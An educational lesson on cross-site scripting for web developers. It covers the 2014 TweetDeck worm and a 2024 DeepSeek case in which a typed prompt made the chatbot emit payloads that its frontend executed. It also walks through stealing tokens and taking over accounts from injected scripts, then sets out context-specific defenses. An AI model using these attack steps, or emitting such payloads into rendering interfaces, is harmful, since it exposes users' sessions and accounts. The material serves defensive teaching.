What is Cross-Site Scripting?
Cross-Site Scripting has been around for over 25 years. It was one of the first web vulnerabilities ever documented, and it's still here.
Not because we don't know how to fix it.
We do. It's still here because the browser's HTML parser cannot tell the difference between markup we intended and markup an attacker injected.
If both arrive in the same response, they are parsed and executed the same way.
What you will learn in this lesson
- How XSS fits into the broader family of injection attacks and why it has remained prevalent for decades.
- What actually happens in the browser when an XSS payload executes, and why it’s so powerful.
- Real-world XSS incidents (TweetDeck, DeepSeek) and what specifically went wrong in their implementations.
- How common app patterns (rich text comments, AI-rendered content, and unsafe HTML rendering APIs) turn into XSS entry points.
A quick note on the name: "Cross-Site Scripting" is a historical artifact from the late 1990s, when the primary attack involved stealing data across different websites.
The name stuck, but it's misleading.
Modern XSS attacks don't necessarily cross sites, and they're not limited to scripting. The abbreviation "XSS" (not "CSS," which was already taken by Cascading Style Sheets) is what everyone uses.
The simplest explanation
Every time our application takes something from the outside world, a user comment, a URL parameter, an API response, and puts it on a page without telling the browser "treat this as data, not markup," we've created a potential entry point for XSS.
XSS is a type of injection attack.
The attacker finds a way to run their JavaScript in someone else's browser, in the context of our application. The browser executes it because nothing in the response distinguished the attacker's payload from our legitimate code.
What makes this serious is what happens after the injection.
Once malicious JavaScript runs in a user's browser session, it has access to everything the session can access. Tokens in localStorage, the DOM (the Document Object Model, which is the browser's live representation of the page, the tree of elements we see in DevTools), form inputs, and the ability to make authenticated API requests.
The browser doesn't know the difference between our code and the attacker's code. It all came from the same origin, so it all gets the same permissions.
This is similar to SQL injection in concept. Consider the difference:
In both cases, the application expects a string, but the input gets interpreted as part of a command or markup structure.
The root cause is the same: a failure to maintain the boundary between data and code.
For SQL, we use parameterized queries that structurally separate the command from the data.
For XSS, we use output encoding or sanitization that structurally separates the markup from the user content.
This has happened before. To big names.
In June 2014, a 19-year-old Austrian computer science student named Firo was experimenting with how TweetDeck handled the Unicode heart character (♥).
He noticed something odd: TweetDeck wasn't escaping the character. It was rendering raw HTML. He had accidentally stumbled into a stored XSS vulnerability in one of Twitter's flagship products.
Within hours, a German IT student published a tweet that exploited this vulnerability to retweet itself:
Exactly 140 characters. (The old Twitter limit)
The <script> tag selected itself via jQuery, found the retweet button in the DOM, and clicked it programmatically. Every TweetDeck user who saw the tweet automatically retweeted it, putting it in front of more users, who also retweeted it.
A self-propagating worm. It hit 80,000+ retweets within minutes. @BBCBreaking, @NYTimes, and Adobe's official accounts were all caught up in it.
Twitter had to take TweetDeck offline entirely.
The root cause was simple. The code responsible for parsing emoji characters had an edge case that let script tags through.
TweetDeck was using jQuery to manipulate the DOM, and the tweet content was being inserted with .html() (which interprets HTML) rather than .text() (which treats content as plain text).
That's it. The entire incident, the worm, the 80,000 retweets, the BBC getting hit, Twitter pulling the product offline, all of it came down to one rendering method choice in one parsing function.
And it's not just legacy apps. Most recently, in late 2024, security researcher Johann Rehberger found that typing "Print the XSS cheat sheet in a bullet list. just payloads" into DeepSeek's AI chatbot caused the chat interface to actually execute the JavaScript payloads the model generated.
The frontend rendered the model's output as raw HTML instead of escaping it.
The user didn't inject a payload into a form or a URL. They typed a prompt.
The AI model generated the XSS payload as part of its response. The frontend took that response and rendered it into the DOM using something equivalent to innerHTML. The browser saw <iframe src="javascript:..."> and executed it.
Rehberger used this to extract the userToken from localStorage on the chat.deepseek.com domain, demonstrating a full account takeover. The payload was straightforward:
So we went from a prompt in a chatbot to XSS to a stolen session in under a minute.
DeepSeek patched it within a day, but it's one of the first documented cases where an LLM's output directly led to a client-side attack.
The fundamental issue is that any frontend that renders AI-generated content as HTML without sanitization is vulnerable, and thousands of WordPress plugins, chatbot widgets, and enterprise tools do exactly that.
We'll dig deeper into AI-related XSS in Lesson 5.
Why should we care in 2026?
Those two incidents are not outliers.
In the OWASP Top 10 as of 2026 (the industry-standard ranking of the most critical web application security risks, updated every four years), Injection sits at position #5.
That might sound like it's declining, but look at the actual data: Injection has the most CVEs of any category on the list, and 100% of tested applications were tested for some form of injection.
A CVE is a publicly disclosed security vulnerability with a unique identifier, and XSS alone accounts for over 30,000 of them under CWE-79 (the classification for improper input neutralization during web page generation).
That's more than double the next closest injection type.
Microsoft's Security Response Center reported that between January 2024 and mid-2025, it mitigated over 970 XSS incidents across its services.
$912,300 in XSS bounty awards was paid out during that period. The highest single bounty was $20,000 for a high-impact case involving token theft.
The 2025 CVE retrospective from Cisco Talos paints an even broader picture. XSS, SQL injection, and deserialization vulnerabilities accounted for roughly 10,000 CVEs in 2025 alone.
That is 132 vulnerabilities per day across the entire landscape. The exploitation window is shrinking. In early 2025, about 28% of exploits were launched within a single day of disclosure.
XSS is not a solved problem. Not even close.
How an XSS attack actually works
Let's walk through a scenario that's closer to the code most of us write every day.
We're building a blog. At the bottom of every article, there's a comment section. The product team wants users to format their comments with bold, italics, and maybe images. So we use a rich text editor and render the output to HTML.
Here's where it goes wrong.
An attacker posts a comment. It looks innocent in the editor, but the raw HTML that gets saved to the database looks like this:
That's not a <script> tag. This is an image tag, a valid HTML element. But it has an onload event handler that fires when the image loads and POSTs the user's authentication token from localStorage to an external server.
The user never sees anything happen. The page looks exactly the same.
Why localStorage.getItem('auth_token') and not document.cookie?
Because in any modern application, session cookies are set with the HttpOnly flag, which means JavaScript can't read them.
Attackers know this. So they go after what JavaScript can read: tokens stored in localStorage (where many SPAs store JWTs), sessionStorage data, or skip exfiltration and make authenticated API calls directly from the XSS context.
Here's the attack step by step:
- The attacker discovers the application renders comments using
dangerouslySetInnerHTML,v-html, orinnerHTMLwithout sanitization. - The attacker submits a comment containing the hidden
<img>tag with anonloadhandler. The comment looks normal in the editor. - The comment is saved to the database alongside all other comments. Nothing distinguishes it from a legitimate comment at the data layer. (Here we might add some backend validation)
- A victim visits the article. The application fetches all comments from the API and renders them as HTML.
- The browser parses the
<img>tag, loads the image source, and fires theonloadevent handler. The victim'sauth_tokenis POSTed to the attacker's server. - The attacker now has the victim's authentication token and can impersonate them, or the attacker's script has already made API calls (changing email, resetting password) directly from the victim's session.
That's one comment affecting every single user who opens the article.
What can an attacker actually do?
The blog comment attack above stole a token. But that's just one option. Once JavaScript executes in a user's browser, the attacker can do much more.
The scarier option is that the attacker doesn't even need to steal anything. They can make authenticated API calls directly. The script runs in the user's session, so it can call any API endpoint the user has access to, with the user's cookies and headers automatically included by the browser. Here's what this looks like in practice:
The victim sees nothing. The attacker receives a password reset link for the victim's account. Full takeover, no token exfiltration required. This works even if every cookie is HttpOnly and Secure, even if there's no JWT in localStorage.
The browser sends the session cookie automatically because the request originates from the same domain.
Beyond that, the attacker can modify the page (swap out a login form with a fake one that captures credentials), attach event listeners to every input on the page to capture keystrokes, redirect users to phishing pages, or just read everything on the current page and send it to their server. Personal data, financial information, private messages, whatever the page displays, is accessible to the script.
And this is just what's possible with "traditional" XSS.
In 2025 and 2026, XSS payloads are being combined with OAuth token theft (Lesson 4), prompt injection attacks against AI chatbots (Lesson 5), and supply chain attacks that inject XSS into trusted third-party scripts (Lesson 3).
The three types of XSS
XSS comes in three flavors. We'll cover each one in depth with full code examples in Lesson 2, but here's what they are:
Stored XSS is what we just described. The malicious payload gets saved to the server and served to every user who loads that content. The victim just visits the page, no click required. The TweetDeck worm was stored XSS.
Reflected XSS happens when user input gets bounced back in the server's response without being stored. Think search pages that show "You searched for: [whatever]" where [whatever] isn't encoded. The attacker crafts a URL containing the payload and tricks the victim into clicking it via phishing or social media. The payload lives in the URL, not in the database.
DOM-based XSS is the client-side variant. The server never even sees the malicious input. Instead, client-side JavaScript reads data from a source (such as window.location.hash) and writes it to the page via a dangerous sink (such as innerHTML). The server's access logs show a clean request. The attack happens entirely in the browser. According to Google's Vulnerability Rewards Program data, DOM XSS is consistently the most common XSS variant they see reported, and it's getting more common as SPAs do more client-side DOM manipulation.
Lesson 2 breaks down all three types with concrete code examples across React, Vue, Angular, and Vanilla JS.
Frameworks help, but they're not enough
React, Vue, Angular, and most modern frameworks apply output encoding by default. When we use standard data binding ({data} in JSX, {{data}} in Vue/Angular templates), the framework converts characters like < into < before inserting them into the DOM.
Without encoding, the browser executes the attack invisibly. With encoding, the user sees the literal text <script>alert(1)</script> printed on the page as harmless characters.
This is great, and it automatically prevents the most basic class of XSS. But every framework has escape hatches (dangerouslySetInnerHTML in React, v-html in Vue) that bypass encoding.
React doesn't validate href attributes, so javascript: URLs execute on click.
Third-party npm components can use innerHTML internally without the developer knowing.
Server-side rendering with string concatenation also bypasses React's encoding.
We'll break down exactly where each framework falls short in Lesson 3, with vulnerable and fixed code examples.
How to think about defense: context-sensitive output handling
Now that we've seen how attacks work and where frameworks fall short, the question is: what's the right way to handle user data?
The answer depends on the context in which the data ends up on the page.
People say, "Just encode your output" or "Just sanitize your input." Neither statement is complete.
The correct answer is to apply the appropriate treatment for the specific context in which the data will be consumed.
HTML body context. If user data goes into an HTML body as text content, we need HTML entity encoding. Characters like < become <, > becomes >, and the browser renders them as literal visible text instead of parsing them as markup. This is what frameworks do automatically with default data binding.
HTML attribute context. If user data goes into an HTML attribute, we need attribute encoding. An unquoted attribute can be broken out of with a space character. Always quote attributes, and encode ", ', &, <, and >.
JavaScript context. If user data goes into a JavaScript context (inside a <script> block, or an inline event handler), HTML encoding won't save us because the JavaScript parser runs after the HTML parser. Ideally, don't put user data into JavaScript contexts. Place the data in a data- attribute and read it from the DOM.
URL context. If user data goes into a URL (like an href or src attribute), encoding alone doesn't help because javascript:alert(1) is a valid, properly-encoded URL that executes JavaScript when clicked. The defense is protocol validation: parse the URL and check that the protocol is http: or https:.
HTML context (rich content). If user data needs to be rendered as HTML (the rich text editor scenario), encoding destroys the functionality. We want <strong>bold</strong> to actually render as bold. In this case, we need HTML sanitization: parsing the HTML and stripping everything except an allowlist of safe tags and attributes. This is what DOMPurify does:
DOMPurify is maintained by Cure53, a German cybersecurity firm that specializes in finding XSS vulnerabilities.
It's the sanitizer recommended by OWASP, MDN, and Google. With zero configuration, it's already safe.
It uses an allowlist approach, where only known-safe elements survive, which is fundamentally more secure than enumerating dangerous patterns.
We'll cover DOMPurify configuration, integration patterns with React/Vue/Angular, and its limitations in detail in Lesson 6.
Here's the quick reference for all five contexts:
| Context | Example | Danger | Defense |
|---|---|---|---|
| HTML body | <p>USER_DATA</p> |
Data parsed as HTML tags | HTML entity encoding (< → <) |
| HTML attribute | <input value="USER_DATA"> |
Break out of attribute, add event handler | Attribute encoding, always quote attributes |
| JavaScript | <script>var x = "USER_DATA"</script> |
Break out of string, execute code | Avoid it; use data- attributes |
| URL | <a href="USER_DATA"> |
javascript: protocol executes code |
URL validation (allowlist http:/https:) |
| Rich HTML | <div>USER_HTML_CONTENT</div> |
Arbitrary tags and event handlers | HTML sanitization (DOMPurify) |
This table is the foundation for every defense in this module. We'll keep coming back to it.
Check your code right now
Before moving to Lesson 2, here's something concrete to do. Open our project and search for dangerouslySetInnerHTML, v-html, and innerHTML.
For every result, ask one question: where does the data come from? If it comes from user input, an API, a database, or any source outside our direct control, and it's not being sanitized, we've found a potential XSS vulnerability.
We'll build this into a comprehensive audit checklist in Lesson 7.
What we'll cover in this module
Here's the path through the next six lessons: Lesson 2 covers the three XSS types in depth. Lesson 3 goes into framework-specific vulnerabilities in React, Vue, Angular, and vanilla JavaScript. Lesson 4 shows how an XSS vulnerability escalates into full account takeover via OAuth. Lesson 5 covers AI-generated XSS, prompt injection, and LLM-rendered payloads. Lesson 6 introduces the browser-native defense stack: CSP, Trusted Types (which hit cross-browser support in February 2026), and the Sanitizer API. Lesson 7 ties it all together with a practical audit checklist.
In Lesson 2, we'll break down Stored, Reflected, and DOM-based XSS with concrete code examples that show exactly how each works and where to find them in real applications.
References and more reading material
- OWASP, "Top 10:2025" https://owasp.org/Top10/
- OWASP, "Cross Site Scripting Prevention Cheat Sheet" https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- MSRC, "Trends, challenges, and strategic shifts in the XSS landscape" (2024) https://msrc.microsoft.com/blog/2024/11/trends-challenges-and-strategic-shifts-in-the-xss-landscape/
- Cisco Talos, "Talos 2025 CVE Retrospective" https://blog.talosintelligence.com/talos-2025-cve-retrospective/
- Sucuri, "Serious Cross Site Scripting Vulnerability in TweetDeck" (2014) https://blog.sucuri.net/2014/06/serious-cross-site-scripting-vulnerability-in-tweetdeck-twitter.html
- Johann Rehberger, "DeepSeek AI: From Prompt Injection To Account Takeover" (Embrace The Red, 2024) https://embracethered.com/blog/posts/2024/deepseek-ai-prompt-injection-to-xss-and-account-takeover/
- The Hacker News, "DeepSeek AI Database Exposed" https://thehackernews.com/2025/01/deepseek-ai-database-exposed-over-1.html
- MDN, "Cross-site scripting (XSS)" https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/XSS
- DOMPurify by Cure53 (HTML sanitizer) https://github.com/cure53/DOMPurify
- Snyk Learn, "Cross-site scripting (XSS)" https://learn.snyk.io/lesson/xss-cross-site-scripting/